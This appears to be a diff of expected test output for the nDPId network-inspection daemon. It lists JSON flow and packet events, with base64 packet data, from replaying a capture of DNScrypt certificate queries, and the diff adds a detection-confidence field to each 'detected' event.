 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":192,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311153,"flow_last_seen":946739311153,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739311153,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":38349,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01135{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":192,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":1,"flow_last_seen":946739311153,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739311153,"pkt":"REREREREZmZmZmZmCABFAAIctEJAAL0RBKQKAAABzbl0dJXNAikCCAUEnScBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAdmcmVldHNhA29yZwAAEAABAAAAAAAAAAAAAcgADAHEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":192,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311153,"flow_last_seen":946739311153,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739311153,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":38349,"dst_port":553,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":192,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311153,"flow_last_seen":946739311153,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739311153,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":38349,"dst_port":553,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":193,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311153,"flow_last_seen":946739311153,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739311153,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":38879,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01135{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":193,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":946739311153,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739311153,"pkt":"REREREREZmZmZmZmCABFAAIctENAAL0RBKMKAAABzbl0dJffAikCCAUEnSsBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAdmcmVldHNhA29yZwAAEAABAAAAAAAAAAAAAcgADAHEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":193,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311153,"flow_last_seen":946739311153,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739311153,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":38879,"dst_port":553,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":193,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311153,"flow_last_seen":946739311153,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739311153,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":38879,"dst_port":553,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":194,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311153,"flow_last_seen":946739311153,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739311153,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":43528,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01135{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":194,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":1,"flow_last_seen":946739311153,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739311153,"pkt":"REREREREZmZmZmZmCABFAAIctERAAL0RBKIKAAABzbl0dKoIAikCCAUEnSkBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAdmcmVldHNhA29yZwAAEAABAAAAAAAAAAAAAcgADAHEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":194,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311153,"flow_last_seen":946739311153,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739311153,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":43528,"dst_port":553,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":194,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311153,"flow_last_seen":946739311153,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739311153,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":43528,"dst_port":553,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":195,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311153,"flow_last_seen":946739311153,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739311153,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":51770,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02418{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":195,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":946739311153,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739311153,"pkt":"REREREREZmZmZmZmCABFAAXctEUgAL0RIOEKAAABzbl0dMo6AikGBP1vnSoBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAdmcmVldHNhA29yZwAAEAABAAAAAAAAAAAABcQADAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":195,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311153,"flow_last_seen":946739311153,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739311153,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":51770,"dst_port":553,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":195,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311153,"flow_last_seen":946739311153,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739311153,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":51770,"dst_port":553,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":196,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311153,"flow_last_seen":946739311153,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739311153,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":38278,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02418{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":196,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":1,"flow_last_seen":946739311153,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739311153,"pkt":"REREREREZmZmZmZmCABFAAXctEYgAL0RIOAKAAABzbl0dJWGAikGBDIonSYBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAdmcmVldHNhA29yZwAAEAABAAAAAAAAAAAABcQADAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":196,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311153,"flow_last_seen":946739311153,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739311153,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":38278,"dst_port":553,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":196,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311153,"flow_last_seen":946739311153,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739311153,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":38278,"dst_port":553,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":197,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739311153,"pkt":"REREREREZmZmZmZmCABFAABQtEUAub0RRbQKAAABzbl0dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":197,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":198,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739311153,"pkt":"REREREREZmZmZmZmCABFAABQtEYAub0RRbMKAAABzbl0dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":198,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":199,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311153,"flow_last_seen":946739311153,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739311153,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":55822,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02418{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":199,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":1,"flow_last_seen":946739311153,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739311153,"pkt":"REREREREZmZmZmZmCABFAAXctEcgAL0RIN8KAAABzbl0dNoOAikGBO2dnSgBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAdmcmVldHNhA29yZwAAEAABAAAAAAAAAAAABcQADAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA